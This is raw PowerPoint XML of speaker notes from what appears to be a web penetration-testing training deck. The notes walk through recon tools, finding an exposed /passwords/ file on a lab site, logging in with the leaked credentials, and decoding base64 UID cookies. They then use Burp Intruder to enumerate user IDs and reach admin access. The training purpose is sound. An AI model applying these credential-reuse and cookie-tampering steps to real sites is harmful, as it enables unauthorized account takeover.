              <a:t> will show the contents of the file and the code is not interpreted on the server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517277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Information Gathering stage: Passive and non-passive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> methods. Looking for email addresses, how names are used, phone numbers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> site maps, any useful information that could be leveraged during the pen test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Application Workflows: Mapping all web services, web pages, finger printing of technologies used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Automated and Manual Fuzzing: Use automated scanners to quickly find possible attack vectors. Manually fuzz parameters and validate automated scan results. Any forced directory/file browsing would happen here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Exploit: Prove that the vulnerability exits and could potentially be used. The vulnerability would then be recorded for the findings report that also links back to the OWASP top 10, NIST, or CVE list.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7011107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With a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file extension the proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> will not show the contents of the file and the code is interpreted on the server.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Even if the file gets interpreted, and injection is possible, then one can still read these files with a little effort.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3358565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Browser to /passwords/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>There is an information disclosure on this page as well, Apache version 2.4.7 on port 80, on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3553976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Looks like a CSV file – maybe used to insert into the database, or a dump of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16592798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Looks the same as the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> version.</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1768863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We were given a list of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> user names and passwords. Try each one out and see what happens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Note: Firebug was used to change the type=“password” to type=“text” on the password field.</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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8645778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It appears we have a valid login but I don’t see any admin links on the left.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052758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View the Request/Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in Burp. Also notice that once we POST to login, the page does a separate GET on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to fetch content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Once logged in we can see that we get two Set-Cookies – a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> session id and a UID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Continue testing the user/pass combinations we have.</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1445806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We could test all users in the browser,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> but lets speed this up and test with the Repeater tool. Optionally you can send the original response to the Comparer tool along with each user and see what changes in the responses. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Find the POST to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and then either right click and send to Repeater or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>CTRL+r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>CMD+r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to send.</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3867378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After sending the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Request to the Repeater tab, validate the original returns the same response.</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14986236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Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and password variables for John and see what the results are.</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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3119448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dig -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>axfr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>domain.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>domain.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> be obtained through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ccTLDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> website, or registrars website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>DNSrecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a python script that will try to find all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> records, useful with reverse PTR records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>SSL/TLS certificates are more commonly using one cert to cover multiple web sites by using Subject Alternate Names or SAN values </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Google/Bing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dorking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> parse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> crawled results for some hidden treasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a Firefox/Chrome extension for showing underlying technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Firebug/Developer Tools to view/modify source code of the webpage, or to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from the console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Other search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>enging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> results – duck duck go, yahoo, amazon, twitter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>instagram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. Some may provide hidden content, others could be used for social engineering if needed.</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11627055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Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and password variables for Adrian and see what the results are.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27822843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Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and password variables for Admin and see what the results are.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30397248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Add results to the Notes tab for easy reference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that for each user that was logged in the UID is changing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Not sure what the UID happens to be, so try to decode the strings. </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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25979229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Can also be used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with spreadsheets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17258366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Copy the 3 user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> UID’s into the Decoder tool. In the upper most section Click on Decode As, then start walking through options to see if the strings make sense.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When you select URL, you will see the string appear to be base64 encoded – just like the comments on the HTML page said it would be.</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41411113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Now that we see the strings are what appears to be base64 encodings,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> decode them. In the bottom most Decode As dropdown, select Base64.</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9496795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We can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> now see that the UIDs appear to just be plain integers. Should be easy to guess the admin should be a UID of 0 or 1. We will send to the Intruder tool to quickly validate, and see if other users exist as well. </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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9129012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Go back to the Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tab and select the GET after Ed’s successful login. Either CTRL+I or CMD+I the request to send to Intruder, or right click on the request and send it to the Intruder tool.</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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25350812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There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is nothing that needs to be changed on the Target tab inside of Intruder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Validate that the host and port are correct.</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8784845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For this attack we only need to fuzz one parameter. So Clear all selections that were made by Burp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>= select all text after the equal sign and click the Add button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As we are only fuzzing a single parameter, keep the attack type set to Sniper.</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284083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err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to help fingerprint but this can also be used with many NSE to help exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Foca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a windows tool to parse file metadata found on the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> gathers emails, subdomains, hosts, employee names, open ports, and banners from public sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Recon-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> offers many modules for discovery, some are free and some are very expensive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>CeWL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is normally used to crawl a website and scrape words for password cracking. Also useful for forced directory/file browsing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>. Has both a free and paid version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is normally used for attacks but also has a lot of discovery modules.</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13652879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In the Payload section we are going</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to set the Payload Type to Numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Then give a numerical range starting at 0 and ends at 10. After each test increment by 1.</a:t>
            </a:r>
          </a:p>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19108463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We need to base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> encode each number and then also URL encode the value. The URL encoding will happen, as below the “=“ will automatically be URL encoded. If not you can add this character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To add the base64 encoding Add a new payload processing rule of Base64-encode and make sure it is enabled.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38440928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Add the following </a:t>
            </a:r>
            <a:r>
